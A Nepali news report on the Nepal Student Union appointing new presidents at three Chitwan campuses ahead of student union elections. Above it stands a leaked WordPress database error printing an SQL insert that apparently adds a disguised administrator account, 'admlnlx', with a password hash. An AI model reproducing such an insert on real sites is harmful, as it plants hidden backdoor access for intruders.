WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BOjjpyMzx1WgoiV1u5bv0rEkww87kU0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 23:13:16', '', 'admlnlx', 'admlnlx')
चितवन, माघ १०–
चितवनका तीन वटा क्याम्पसहरुमा नेपाल विद्यार्थी संघको नयाँ सभापति चयन गरिएको छ ।
नेपाल विद्यार्थी संघको ११ औं महाधिवेशनमा क्याम्पस सभापतिहरुले माथिल्लो पदमा उम्मेदवारी दिएपछि रिक्त रहेका चितवनका तीन वटा कलेजमा नयाँ जिम्मेवारी प्रदान गरिएको हो ।
नेविसंघको केन्द्रीय समिति एवंम पार्टीसंग समन्वय गरि वीरेन्द्र बहुमुखी क्याम्पसमा अनमोल अधिकारी, मैयाँदेवी कन्या कलेजमा विनिता चापागाई र बालकुमारी कलेजमा सुरेश पौडेललाई सभापतिको जिम्मेवारी दिईएको नेविसंघ चितवनका सभापति सूर्य ढकालले नारायणी अनलाईनलाई जानकारी दिनुभयो ।
नेविसंघ केन्द्रीय समितिको मंसिर १ गते प्राप्त पत्र अनुसार रिक्त रहेको स्थानमा विधान अनुसार अध्यक्षको अधिकार प्रयोग गरि उक्त जिम्मेवारी दिइएको सभापति ढकालले जानकारी दिनुभयो । आउँदो फागुन १४ गते हुने स्वतन्त्र विद्यार्थी युनियन (स्ववियु)को निर्वाचनलाई लक्षित गरि नेविसंघलाई विजयी गराउन र शैक्षिक आन्दोलनलाई थप उचाईमा पुर्याउन सहयोग गर्ने उद्देश्यका साथ रिक्त रहेका कलेजहरुमा जिम्मेवारी दिईको सभापति ढकालको भनाई छ । योसंगै स्ववियुको निर्वाचनमा सबै कलेजमा नेविसंघलाई विजयी गराउनका लागि सबै विद्यार्थीहरुलाई समेत उहाँले आह्वान गर्नुभयो ।